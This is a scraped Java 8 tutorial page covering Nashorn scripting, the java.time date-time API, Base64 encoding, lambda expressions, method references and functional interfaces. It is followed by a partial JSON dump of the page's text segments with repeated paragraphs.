catch(ScriptException e) { System.out.println("Error executing script: "+ e.getMessage()); } System.out.println(result.toString()); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following result − Mahesh 12 The following example explains how to import and use Java classes in java script. Create and save sample.js in c:\> JAVA folder. var BigDecimal = Java.type('java.math.BigDecimal'); function calculate(amount, percentage) { var result = new BigDecimal(amount).multiply(new BigDecimal(percentage)).divide( new BigDecimal("100"), 2, BigDecimal.ROUND_HALF_EVEN); return result.toPlainString(); } var result = calculate(568000000000000000023,13.9); print(result); Open the console and use the following command. C:\JAVA>jjs sample.js It should produce the following output − 78952000000000000003.20 With Java 8, a new Date-Time API is introduced to cover the following drawbacks of old date-time API. Not thread safe − java.util.Date is not thread safe, thus developers have to deal with concurrency issue while using date. The new date-time API is immutable and does not have setter methods. Not thread safe − java.util.Date is not thread safe, thus developers have to deal with concurrency issue while using date. The new date-time API is immutable and does not have setter methods. Poor design − Default Date starts from 1900, month starts from 1, and day starts from 0, so no uniformity. The old API had less direct methods for date operations. The new API provides numerous utility methods for such operations. Poor design − Default Date starts from 1900, month starts from 1, and day starts from 0, so no uniformity. The old API had less direct methods for date operations. The new API provides numerous utility methods for such operations. Difficult time zone handling − Developers had to write a lot of code to deal with timezone issues. The new API has been developed keeping domain-specific design in mind. Difficult time zone handling − Developers had to write a lot of code to deal with timezone issues. The new API has been developed keeping domain-specific design in mind. Java 8 introduces a new date-time API under the package java.time. Following are some of the important classes introduced in java.time package. Local − Simplified date-time API with no complexity of timezone handling. Local − Simplified date-time API with no complexity of timezone handling. Zoned − Specialized date-time API to deal with various timezones. Zoned − Specialized date-time API to deal with various timezones. LocalDate/LocalTime and LocalDateTime classes simplify the development where timezones are not required. Let's see them in action. Create the following java program using any editor of your choice in, say, C:\> JAVA. import java.time.LocalDate; import java.time.LocalTime; import java.time.LocalDateTime; import java.time.Month; public class Java8Tester { public static void main(String args[]) { Java8Tester java8tester = new Java8Tester(); java8tester.testLocalDateTime(); } public void testLocalDateTime() { // Get the current date and time LocalDateTime currentTime = LocalDateTime.now(); System.out.println("Current DateTime: " + currentTime); LocalDate date1 = currentTime.toLocalDate(); System.out.println("date1: " + date1); Month month = currentTime.getMonth(); int day = currentTime.getDayOfMonth(); int seconds = currentTime.getSecond(); System.out.println("Month: " + month +"day: " + day +"seconds: " + seconds); LocalDateTime date2 = currentTime.withDayOfMonth(10).withYear(2012); System.out.println("date2: " + date2); //12 december 2014 LocalDate date3 = LocalDate.of(2014, Month.DECEMBER, 12); System.out.println("date3: " + date3); //22 hour 15 minutes LocalTime date4 = LocalTime.of(22, 15); System.out.println("date4: " + date4); //parse a string LocalTime date5 = LocalTime.parse("20:15:30"); System.out.println("date5: " + date5); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − Current DateTime: 2014-12-09T11:00:45.457 date1: 2014-12-09 Month: DECEMBERday: 9seconds: 45 date2: 2012-12-10T11:00:45.457 date3: 2014-12-12 date4: 22:15 date5: 20:15:30 Zoned date-time API is to be used when time zone is to be considered. Let us see them in action. Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.time.ZonedDateTime; import java.time.ZoneId; public class Java8Tester { public static void main(String args[]) { Java8Tester java8tester = new Java8Tester(); java8tester.testZonedDateTime(); } public void testZonedDateTime() { // Get the current date and time ZonedDateTime date1 = ZonedDateTime.parse("2007-12-03T10:15:30+05:30[Asia/Karachi]"); System.out.println("date1: " + date1); ZoneId id = ZoneId.of("Europe/Paris"); System.out.println("ZoneId: " + id); ZoneId currentZone = ZoneId.systemDefault(); System.out.println("CurrentZone: " + currentZone); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − date1: 2007-12-03T10:15:30+05:00[Asia/Karachi] ZoneId: Europe/Paris CurrentZone: Etc/UTC java.time.temporal.ChronoUnit enum is added in Java 8 to replace the integer values used in old API to represent day, month, etc. Let us see them in action. Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.time.LocalDate; import java.time.temporal.ChronoUnit; public class Java8Tester { public static void main(String args[]) { Java8Tester java8tester = new Java8Tester(); java8tester.testChromoUnits(); } public void testChromoUnits() { //Get the current date LocalDate today = LocalDate.now(); System.out.println("Current date: " + today); //add 1 week to the current date LocalDate nextWeek = today.plus(1, ChronoUnit.WEEKS); System.out.println("Next week: " + nextWeek); //add 1 month to the current date LocalDate nextMonth = today.plus(1, ChronoUnit.MONTHS); System.out.println("Next month: " + nextMonth); //add 1 year to the current date LocalDate nextYear = today.plus(1, ChronoUnit.YEARS); System.out.println("Next year: " + nextYear); //add 10 years to the current date LocalDate nextDecade = today.plus(1, ChronoUnit.DECADES); System.out.println("Date after ten year: " + nextDecade); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following result − Current date: 2014-12-10 Next week: 2014-12-17 Next month: 2015-01-10 Next year: 2015-12-10 Date after ten year: 2024-12-10 With Java 8, two specialized classes are introduced to deal with the time differences. Period − It deals with date based amount of time. Period − It deals with date based amount of time. Duration − It deals with time based amount of time. Duration − It deals with time based amount of time. Let us see them in action. Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.time.temporal.ChronoUnit; import java.time.LocalDate; import java.time.LocalTime; import java.time.Duration; import java.time.Period; public class Java8Tester { public static void main(String args[]) { Java8Tester java8tester = new Java8Tester(); java8tester.testPeriod(); java8tester.testDuration(); } public void testPeriod() { //Get the current date LocalDate date1 = LocalDate.now(); System.out.println("Current date: " + date1); //add 1 month to the current date LocalDate date2 = date1.plus(1, ChronoUnit.MONTHS); System.out.println("Next month: " + date2); Period period = Period.between(date2, date1); System.out.println("Period: " + period); } public void testDuration() { LocalTime time1 = LocalTime.now(); Duration twoHours = Duration.ofHours(2); LocalTime time2 = time1.plus(twoHours); Duration duration = Duration.between(time1, time2); System.out.println("Duration: " + duration); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − Current date: 2014-12-10 Next month: 2015-01-10 Period: P-1M Duration: PT2H TemporalAdjuster is used to perform the date mathematics. For example, get the "Second Saturday of the Month" or "Next Tuesday". Let us see them in action. Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.time.LocalDate; import java.time.temporal.TemporalAdjusters; import java.time.DayOfWeek; public class Java8Tester { public static void main(String args[]) { Java8Tester java8tester = new Java8Tester(); java8tester.testAdjusters(); } public void testAdjusters() { //Get the current date LocalDate date1 = LocalDate.now(); System.out.println("Current date: " + date1); //get the next tuesday LocalDate nextTuesday = date1.with(TemporalAdjusters.next(DayOfWeek.TUESDAY)); System.out.println("Next Tuesday on : " + nextTuesday); //get the second saturday of next month LocalDate firstInYear = LocalDate.of(date1.getYear(),date1.getMonth(), 1); LocalDate secondSaturday = firstInYear.with(TemporalAdjusters.nextOrSame( DayOfWeek.SATURDAY)).with(TemporalAdjusters.next(DayOfWeek.SATURDAY)); System.out.println("Second Saturday on : " + secondSaturday); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following result − Current date: 2014-12-10 Next Tuesday on : 2014-12-16 Second Saturday on : 2014-12-13 A toInstant() method is added to the original Date and Calendar objects, which can be used to convert them to the new Date-Time API. Use an ofInstant(Insant,ZoneId) method to get a LocalDateTime or ZonedDateTime object. Let us see them in action. Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.time.LocalDateTime; import java.time.ZonedDateTime; import java.util.Date; import java.time.Instant; import java.time.ZoneId; public class Java8Tester { public static void main(String args[]) { Java8Tester java8tester = new Java8Tester(); java8tester.testBackwardCompatability(); } public void testBackwardCompatability() { //Get the current date Date currentDate = new Date(); System.out.println("Current date: " + currentDate); //Get the instant of current date in terms of milliseconds Instant now = currentDate.toInstant(); ZoneId currentZone = ZoneId.systemDefault(); LocalDateTime localDateTime = LocalDateTime.ofInstant(now, currentZone); System.out.println("Local date: " + localDateTime); ZonedDateTime zonedDateTime = ZonedDateTime.ofInstant(now, currentZone); System.out.println("Zoned date: " + zonedDateTime); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − Current date: Wed Dec 10 05:44:06 UTC 2014 Local date: 2014-12-10T05:44:06.635 Zoned date: 2014-12-10T05:44:06.635Z[Etc/UTC] With Java 8, Base64 has finally got its due. Java 8 now has inbuilt encoder and decoder for Base64 encoding. In Java 8, we can use three types of Base64 encoding. Simple − Output is mapped to a set of characters lying in A-Za-z0-9+/. The encoder does not add any line feed in output, and the decoder rejects any character other than A-Za-z0-9+/. Simple − Output is mapped to a set of characters lying in A-Za-z0-9+/. The encoder does not add any line feed in output, and the decoder rejects any character other than A-Za-z0-9+/. URL − Output is mapped to set of characters lying in A-Za-z0-9+_. Output is URL and filename safe. URL − Output is mapped to set of characters lying in A-Za-z0-9+_. Output is URL and filename safe. MIME − Output is mapped to MIME friendly format. Output is represented in lines of no more than 76 characters each, and uses a carriage return '\r' followed by a linefeed '\n' as the line separator. No line separator is present to the end of the encoded output. MIME − Output is mapped to MIME friendly format. Output is represented in lines of no more than 76 characters each, and uses a carriage return '\r' followed by a linefeed '\n' as the line separator. No line separator is present to the end of the encoded output. static class Base64.Decoder This class implements a decoder for decoding byte data using the Base64 encoding scheme as specified in RFC 4648 and RFC 2045. static class Base64.Encoder This class implements an encoder for encoding byte data using the Base64 encoding scheme as specified in RFC 4648 and RFC 2045. static Base64.Decoder getDecoder() Returns a Base64.Decoder that decodes using the Basic type base64 encoding scheme. static Base64.Encoder getEncoder() Returns a Base64.Encoder that encodes using the Basic type base64 encoding scheme. static Base64.Decoder getMimeDecoder() Returns a Base64.Decoder that decodes using the MIME type base64 decoding scheme. static Base64.Encoder getMimeEncoder() Returns a Base64.Encoder that encodes using the MIME type base64 encoding scheme. static Base64.Encoder getMimeEncoder(int lineLength, byte[] lineSeparator) Returns a Base64.Encoder that encodes using the MIME type base64 encoding scheme with specified line length and line separators. static Base64.Decoder getUrlDecoder() Returns a Base64.Decoder that decodes using the URL and Filename safe type base64 encoding scheme. static Base64.Encoder getUrlEncoder() Returns a Base64.Encoder that encodes using the URL and Filename safe type base64 encoding scheme. This class inherits methods from the following class − java.lang.Object Create the following Java program using any editor of your choice in say C:/> JAVA. import java.util.Base64; import java.util.UUID; import java.io.UnsupportedEncodingException; public class HelloWorld { public static void main(String args[]) { try { // Encode using basic encoder String base64encodedString = Base64.getEncoder().encodeToString( "TutorialsPoint?java8".getBytes("utf-8")); System.out.println("Base64 Encoded String (Basic) :" + base64encodedString); // Decode byte[] base64decodedBytes = Base64.getDecoder().decode(base64encodedString); System.out.println("Original String: " + new String(base64decodedBytes, "utf-8")); base64encodedString = Base64.getUrlEncoder().encodeToString( "TutorialsPoint?java8".getBytes("utf-8")); System.out.println("Base64 Encoded String (URL) :" + base64encodedString); StringBuilder stringBuilder = new StringBuilder(); for (int i = 0; i < 10; ++i) { stringBuilder.append(UUID.randomUUID().toString()); } byte[] mimeBytes = stringBuilder.toString().getBytes("utf-8"); String mimeEncodedString = Base64.getMimeEncoder().encodeToString(mimeBytes); System.out.println("Base64 Encoded String (MIME) :" + mimeEncodedString); } catch(UnsupportedEncodingException e) { System.out.println("Error :" + e.getMessage()); } } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − Base64 Encoded String (Basic) :VHV0b3JpYWxzUG9pbnQ/amF2YTg= Original String: TutorialsPoint?java8 Base64 Encoded String (URL) :VHV0b3JpYWxzUG9pbnQ_amF2YTg= Base64 Encoded String (MIME) :YmU3NWY2ODktNGM5YS00ODlmLWI2MTUtZTVkOTk2YzQ1Njk1Y2EwZTg2OTEtMmRiZC00YTQ1LWJl NTctMTI1MWUwMTk0ZWQyNDE0NDAwYjgtYTYxOS00NDY5LTllYTctNjc1YzE3YWJhZTk1MTQ2MDQz NDItOTAyOC00ZWI0LThlOTYtZWU5YzcwNWQyYzVhMTQxMWRjYTMtY2MwNi00MzU0LTg0MTgtNGQ1 MDkwYjdiMzg2ZTY0OWU5MmUtZmNkYS00YWEwLTg0MjQtYThiOTQxNDQ2YzhhNTVhYWExZjItNjU2 Mi00YmM4LTk2ZGYtMDE4YmY5ZDZhMjkwMzM3MWUzNDMtMmQ3MS00MDczLWI0Y2UtMTQxODE0MGU5 YjdmYTVlODUxYzItN2NmOS00N2UyLWIyODQtMThlMWVkYTY4M2Q1YjE3YTMyYmItZjllMS00MTFk LWJiM2UtM2JhYzUxYzI5OWI4 16 Lectures 2 hours Malhar Lathkar 19 Lectures 5 hours Malhar Lathkar 25 Lectures 2.5 hours Anadi Sharma 126 Lectures 7 hours Tushar Kale 119 Lectures 17.5 hours Monica Mittal 76 Lectures 7 hours Arnab Chakraborty Print Add Notes Bookmark this page
[ { "code": null, "e": 2161, "s": 1874, "text": "JAVA 8 is a major feature release of JAVA programming language development. Its initial version was released on 18 March 2014. With the Java 8 release, Java provided supports for functional programming, new JavaScript engine, new APIs for date time manipulation, new streaming API, etc." }, { "code": null, "e": 2228, "s": 2161, "text": "Lambda expression − Adds functional processing capability to Java." }, { "code": null, "e": 2295, "s": 2228, "text": "Lambda expression − Adds functional processing capability to Java." }, { "code": null, "e": 2417, "s": 2295, "text": "Method references − Referencing functions by their names instead of invoking them directly. Using functions as parameter." }, { "code": null, "e": 2539, "s": 2417, "text": "Method references − Referencing functions by their names instead of invoking them directly. Using functions as parameter." }, { "code": null, "e": 2605, "s": 2539, "text": "Default method − Interface to have default method implementation." }, { "code": null, "e": 2671, "s": 2605, "text": "Default method − Interface to have default method implementation." }, { "code": null, "e": 2767, "s": 2671, "text": "New tools − New compiler tools and utilities are added like ‘jdeps’ to figure out dependencies." }, { "code": null, "e": 2863, "s": 2767, "text": "New tools − New compiler tools and utilities are added like ‘jdeps’ to figure out dependencies." }, { "code": null, "e": 2926, "s": 2863, "text": "Stream API − New stream API to facilitate pipeline processing." }, { "code": null, "e": 2989, "s": 2926, "text": "Stream API − New stream API to facilitate pipeline processing." }, { "code": null, "e": 3029, "s": 2989, "text": "Date Time API − Improved date time API." }, { "code": null, "e": 3069, "s": 3029, "text": "Date Time API − Improved date time API." }, { "code": null, "e": 3139, "s": 3069, "text": "Optional − Emphasis on best practices to handle null values properly." }, { "code": null, "e": 3209, "s": 3139, "text": "Optional − Emphasis on best practices to handle null values properly." }, { "code": null, "e": 3286, "s": 3209, "text": "Nashorn, JavaScript Engine − A Java-based engine to execute JavaScript code." }, { "code": null, "e": 3363, "s": 3286, "text": "Nashorn, JavaScript Engine − A Java-based engine to execute JavaScript code." }, { "code": null, "e": 3400, "s": 3363, "text": "Consider the following code snippet." }, { "code": null, "e": 4724, "s": 3400, "text": "import java.util.Collections;\nimport java.util.List;\nimport java.util.ArrayList;\nimport java.util.Comparator;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n \n List<String> names1 = new ArrayList<String>();\n names1.add(\"Mahesh \");\n names1.add(\"Suresh \");\n names1.add(\"Ramesh \");\n names1.add(\"Naresh \");\n names1.add(\"Kalpesh \");\n\t\t\n List<String> names2 = new ArrayList<String>();\n names2.add(\"Mahesh \");\n names2.add(\"Suresh \");\n names2.add(\"Ramesh \");\n names2.add(\"Naresh \");\n names2.add(\"Kalpesh \");\n\t\t\n Java8Tester tester = new Java8Tester();\n System.out.println(\"Sort using Java 7 syntax: \");\n\t\t\n tester.sortUsingJava7(names1);\n System.out.println(names1);\n System.out.println(\"Sort using Java 8 syntax: \");\n\t\t\n tester.sortUsingJava8(names2);\n System.out.println(names2);\n }\n \n //sort using java 7\n private void sortUsingJava7(List<String> names) { \n Collections.sort(names, new Comparator<String>() {\n @Override\n public int compare(String s1, String s2) {\n return s1.compareTo(s2);\n }\n });\n }\n \n //sort using java 8\n private void sortUsingJava8(List<String> names) {\n Collections.sort(names, (s1, s2) -> s1.compareTo(s2));\n }\n}" }, { "code": null, "e": 4769, "s": 4724, "text": "Run the program to get the following result." }, { "code": null, "e": 4902, "s": 4769, "text": "Sort using Java 7 syntax:\n[ Kalpesh Mahesh Naresh Ramesh Suresh ]\nSort using Java 8 syntax:\n[ Kalpesh Mahesh Naresh Ramesh Suresh ]\n" }, { "code": null, "e": 5021, "s": 4902, "text": "Here the sortUsingJava8() method uses sort function with a lambda expression as parameter to get the sorting criteria." }, { "code": null, "e": 5220, "s": 5021, "text": "If you want to set up your own environment for Java programming language, then this section guides you through the whole process. Please follow the steps given below to set up your Java environment." }, { "code": null, "e": 5281, "s": 5220, "text": "Java SE can be downloaded for free from the following link −" }, { "code": null, "e": 5360, "s": 5281, "text": "https://www.oracle.com/technetwork/java/javase/downloads/index-jsp-138363.html" }, { "code": null, "e": 5415, "s": 5360, "text": "You download a version based on your operating system." }, { "code": null, "e": 5643, "s": 5415, "text": "Follow the instructions to download Java, and run the .exe to install Java on your machine. Once you have installed Java on your machine, you would need to set environment variables to point to correct installation directories." }, { "code": null, "e": 5717, "s": 5643, "text": "Assuming you have installed Java in c:\\Program Files\\java\\jdk directory −" }, { "code": null, "e": 5771, "s": 5717, "text": "Right-click on 'My Computer' and select 'Properties'." }, { "code": null, "e": 5825, "s": 5771, "text": "Right-click on 'My Computer' and select 'Properties'." }, { "code": null, "e": 5895, "s": 5825, "text": "Click on the 'Environment variables' button under the 'Advanced' tab." }, { "code": null, "e": 5965, "s": 5895, "text": "Click on the 'Environment variables' button under the 'Advanced' tab." }, { "code": null, "e": 6205, "s": 5965, "text": "Now, alter the 'Path' variable so that it also contains the path to the Java executable. For example, if the path is currently set to 'C:\\WINDOWS\\SYSTEM32', then change your path to read 'C:\\WINDOWS\\SYSTEM32;c:\\Program Files\\java\\jdk\\bin'." }, { "code": null, "e": 6445, "s": 6205, "text": "Now, alter the 'Path' variable so that it also contains the path to the Java executable. For example, if the path is currently set to 'C:\\WINDOWS\\SYSTEM32', then change your path to read 'C:\\WINDOWS\\SYSTEM32;c:\\Program Files\\java\\jdk\\bin'." }, { "code": null, "e": 6519, "s": 6445, "text": "Assuming you have installed Java in c:\\Program Files\\java\\jdk directory −" }, { "code": null, "e": 6637, "s": 6519, "text": "Edit the 'C:\\autoexec.bat' file and add the following line at the end −\nSET PATH=%PATH%;C:\\Program Files\\java\\jdk\\bin" }, { "code": null, "e": 6709, "s": 6637, "text": "Edit the 'C:\\autoexec.bat' file and add the following line at the end −" }, { "code": null, "e": 6755, "s": 6709, "text": "SET PATH=%PATH%;C:\\Program Files\\java\\jdk\\bin" }, { "code": null, "e": 6918, "s": 6755, "text": "Environment variable PATH should be set to point to where the Java binaries have been installed. Refer to your shell documentation if you have trouble doing this." }, { "code": null, "e": 7062, "s": 6918, "text": "For example, if you use bash as your shell, then you would add the following line at the end of your '.bashrc: export PATH=/path/to/java:$PATH'" }, { "code": null, "e": 7227, "s": 7062, "text": "To write Java programs, you need a text editor. There are even more sophisticated IDEs available in the market. But for now, you can consider one of the following −" }, { "code": null, "e": 7349, "s": 7227, "text": "Notepad − On Windows machine, you can use any simple text editor like Notepad (recommended for this tutorial) or TextPad." }, { "code": null, "e": 7471, "s": 7349, "text": "Notepad − On Windows machine, you can use any simple text editor like Notepad (recommended for this tutorial) or TextPad." }, { "code": null, "e": 7588, "s": 7471, "text": "Netbeans − It is a Java IDE that is open-source and free. It can be downloaded from https://netbeans.org/index.html." }, { "code": null, "e": 7705, "s": 7588, "text": "Netbeans − It is a Java IDE that is open-source and free. It can be downloaded from https://netbeans.org/index.html." }, { "code": null, "e": 7837, "s": 7705, "text": "Eclipse − It is also a Java IDE developed by the Eclipse open-source community and can be downloaded from https://www.eclipse.org/." }, { "code": null, "e": 7969, "s": 7837, "text": "Eclipse − It is also a Java IDE developed by the Eclipse open-source community and can be downloaded from https://www.eclipse.org/." }, { "code": null, "e": 8157, "s": 7969, "text": "Lambda expressions are introduced in Java 8 and are touted to be the biggest feature of Java 8. Lambda expression facilitates functional programming, and simplifies the development a lot." }, { "code": null, "e": 8219, "s": 8157, "text": "A lambda expression is characterized by the following syntax." }, { "code": null, "e": 8249, "s": 8219, "text": "parameter -> expression body\n" }, { "code": null, "e": 8317, "s": 8249, "text": "Following are the important characteristics of a lambda expression." }, { "code": null, "e": 8458, "s": 8317, "text": "Optional type declaration − No need to declare the type of a parameter. The compiler can inference the same from the value of the parameter." }, { "code": null, "e": 8599, "s": 8458, "text": "Optional type declaration − No need to declare the type of a parameter. The compiler can inference the same from the value of the parameter." }, { "code": null, "e": 8744, "s": 8599, "text": "Optional parenthesis around parameter − No need to declare a single parameter in parenthesis. For multiple parameters, parentheses are required." }, { "code": null, "e": 8889, "s": 8744, "text": "Optional parenthesis around parameter − No need to declare a single parameter in parenthesis. For multiple parameters, parentheses are required." }, { "code": null, "e": 9001, "s": 8889, "text": "Optional curly braces − No need to use curly braces in expression body if the body contains a single statement." }, { "code": null, "e": 9113, "s": 9001, "text": "Optional curly braces − No need to use curly braces in expression body if the body contains a single statement." }, { "code": null, "e": 9312, "s": 9113, "text": "Optional return keyword − The compiler automatically returns the value if the body has a single expression to return the value. Curly braces are required to indicate that expression returns a value." }, { "code": null, "e": 9511, "s": 9312, "text": "Optional return keyword − The compiler automatically returns the value if the body has a single expression to return the value. Curly braces are required to indicate that expression returns a value." }, { "code": null, "e": 9597, "s": 9511, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 11056, "s": 9597, "text": "public class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester tester = new Java8Tester();\n\t\t\n //with type declaration\n MathOperation addition = (int a, int b) -> a + b;\n\t\t\n //with out type declaration\n MathOperation subtraction = (a, b) -> a - b;\n\t\t\n //with return statement along with curly braces\n MathOperation multiplication = (int a, int b) -> { return a * b; };\n\t\t\n //without return statement and without curly braces\n MathOperation division = (int a, int b) -> a / b;\n\t\t\n System.out.println(\"10 + 5 = \" + tester.operate(10, 5, addition));\n System.out.println(\"10 - 5 = \" + tester.operate(10, 5, subtraction));\n System.out.println(\"10 x 5 = \" + tester.operate(10, 5, multiplication));\n System.out.println(\"10 / 5 = \" + tester.operate(10, 5, division));\n\t\t\n //without parenthesis\n GreetingService greetService1 = message ->\n System.out.println(\"Hello \" + message);\n\t\t\n //with parenthesis\n GreetingService greetService2 = (message) ->\n System.out.println(\"Hello \" + message);\n\t\t\n greetService1.sayMessage(\"Mahesh\");\n greetService2.sayMessage(\"Suresh\");\n }\n\t\n interface MathOperation {\n int operation(int a, int b);\n }\n\t\n interface GreetingService {\n void sayMessage(String message);\n }\n\t\n private int operate(int a, int b, MathOperation mathOperation) {\n return mathOperation.operation(a, b);\n }\n}" }, { "code": null, "e": 11108, "s": 11056, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 11140, "s": 11108, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 11177, "s": 11140, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 11203, "s": 11177, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 11244, "s": 11203, "text": "It should produce the following output −" }, { "code": null, "e": 11317, "s": 11244, "text": "10 + 5 = 15\n10 - 5 = 5\n10 x 5 = 50\n10 / 5 = 2\nHello Mahesh\nHello Suresh\n" }, { "code": null, "e": 11391, "s": 11317, "text": "Following are the important points to be considered in the above example." }, { "code": null, "e": 11736, "s": 11391, "text": "Lambda expressions are used primarily to define inline implementation of a functional interface, i.e., an interface with a single method only. In the above example, we've used various types of lambda expressions to define the operation method of MathOperation interface. Then we have defined the implementation of sayMessage of GreetingService." }, { "code": null, "e": 12081, "s": 11736, "text": "Lambda expressions are used primarily to define inline implementation of a functional interface, i.e., an interface with a single method only. In the above example, we've used various types of lambda expressions to define the operation method of MathOperation interface. Then we have defined the implementation of sayMessage of GreetingService." }, { "code": null, "e": 12218, "s": 12081, "text": "Lambda expression eliminates the need of anonymous class and gives a very simple yet powerful functional programming capability to Java." }, { "code": null, "e": 12355, "s": 12218, "text": "Lambda expression eliminates the need of anonymous class and gives a very simple yet powerful functional programming capability to Java." }, { "code": null, "e": 12574, "s": 12355, "text": "Using lambda expression, you can refer to any final variable or effectively final variable (which is assigned only once). Lambda expression throws a compilation error, if a variable is assigned a value the second time." }, { "code": null, "e": 12660, "s": 12574, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 12677, "s": 12660, "text": "Java8Tester.java" }, { "code": null, "e": 13024, "s": 12677, "text": "public class Java8Tester {\n\n final static String salutation = \"Hello! \";\n \n public static void main(String args[]) {\n GreetingService greetService1 = message -> \n System.out.println(salutation + message);\n greetService1.sayMessage(\"Mahesh\");\n }\n\t\n interface GreetingService {\n void sayMessage(String message);\n }\n}" }, { "code": null, "e": 13076, "s": 13024, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 13108, "s": 13076, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 13145, "s": 13108, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 13171, "s": 13145, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 13212, "s": 13171, "text": "It should produce the following output −" }, { "code": null, "e": 13227, "s": 13212, "text": "Hello! Mahesh\n" }, { "code": null, "e": 13410, "s": 13227, "text": "Method references help to point to methods by their names. A method reference is described using \"::\" symbol. A method reference can be used to point the following types of methods −" }, { "code": null, "e": 13425, "s": 13410, "text": "Static methods" }, { "code": null, "e": 13442, "s": 13425, "text": "Instance methods" }, { "code": null, "e": 13489, "s": 13442, "text": "Constructors using new operator (TreeSet::new)" }, { "code": null, "e": 13575, "s": 13489, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 13926, "s": 13575, "text": "import java.util.List;\nimport java.util.ArrayList;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n List names = new ArrayList();\n\t\t\n names.add(\"Mahesh\");\n names.add(\"Suresh\");\n names.add(\"Ramesh\");\n names.add(\"Naresh\");\n names.add(\"Kalpesh\");\n\t\t\n names.forEach(System.out::println);\n }\n}" }, { "code": null, "e": 14003, "s": 13926, "text": "Here we have passed System.out::println method as a static method reference." }, { "code": null, "e": 14055, "s": 14003, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 14087, "s": 14055, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 14124, "s": 14087, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 14150, "s": 14124, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 14191, "s": 14150, "text": "It should produce the following output −" }, { "code": null, "e": 14228, "s": 14191, "text": "Mahesh\nSuresh\nRamesh\nNaresh\nKalpesh\n" }, { "code": null, "e": 14573, "s": 14228, "text": "Functional interfaces have a single functionality to exhibit. For example, a Comparable interface with a single method ‘compareTo’ is used for comparison purpose. Java 8 has defined a lot of functional interfaces to be used extensively in lambda expressions. Following is the list of functional interfaces defined in java.util.Function package." }, { "code": null, "e": 14589, "s": 14573, "text": "BiConsumer<T,U>" }, { "code": null, "e": 14670, "s": 14589, "text": "Represents an operation that accepts two input arguments, and returns no result." }, { "code": null, "e": 14688, "s": 14670, "text": "BiFunction<T,U,R>" }, { "code": null, "e": 14760, "s": 14688, "text": "Represents a function that accepts two arguments and produces a result." }, { "code": null, "e": 14778, "s": 14760, "text": "BinaryOperator<T>" }, { "code": null, "e": 14891, "s": 14778, "text": "Represents an operation upon two operands of the same type, producing a result of the same type as the operands." }, { "code": null, "e": 14908, "s": 14891, "text": "BiPredicate<T,U>" }, { "code": null, "e": 14975, "s": 14908, "text": "Represents a predicate (Boolean-valued function) of two arguments." }, { "code": null, "e": 14991, "s": 14975, "text": "BooleanSupplier" }, { "code": null, "e": 15040, "s": 14991, "text": "Represents a supplier of Boolean-valued results." }, { "code": null, "e": 15052, "s": 15040, "text": "Consumer<T>" }, { "code": null, "e": 15136, "s": 15052, "text": "Represents an operation that accepts a single input argument and returns no result." }, { "code": null, "e": 15157, "s": 15136, "text": "DoubleBinaryOperator" }, { "code": null, "e": 15251, "s": 15157, "text": "Represents an operation upon two double-valued operands and producing a double-valued result." }, { "code": null, "e": 15266, "s": 15251, "text": "DoubleConsumer" }, { "code": null, "e": 15358, "s": 15266, "text": "Represents an operation that accepts a single double-valued argument and returns no result." }, { "code": null, "e": 15376, "s": 15358, "text": "DoubleFunction<R>" }, { "code": null, "e": 15459, "s": 15376, "text": "Represents a function that accepts a double-valued argument and produces a result." }, { "code": null, "e": 15475, "s": 15459, "text": "DoublePredicate" }, { "code": null, "e": 15555, "s": 15475, "text": "Represents a predicate (Boolean-valued function) of one double-valued argument." }, { "code": null, "e": 15570, "s": 15555, "text": "DoubleSupplier" }, { "code": null, "e": 15618, "s": 15570, "text": "Represents a supplier of double-valued results." }, { "code": null, "e": 15638, "s": 15618, "text": "DoubleToIntFunction" }, { "code": null, "e": 15733, "s": 15638, "text": "Represents a function that accepts a double-valued argument and produces an int-valued result." }, { "code": null, "e": 15754, "s": 15733, "text": "DoubleToLongFunction" }, { "code": null, "e": 15849, "s": 15754, "text": "Represents a function that accepts a double-valued argument and produces a long-valued result." }, { "code": null, "e": 15869, "s": 15849, "text": "DoubleUnaryOperator" }, { "code": null, "e": 15965, "s": 15869, "text": "Represents an operation on a single double-valued operand that produces a double-valued result." }, { "code": null, "e": 15979, "s": 15965, "text": 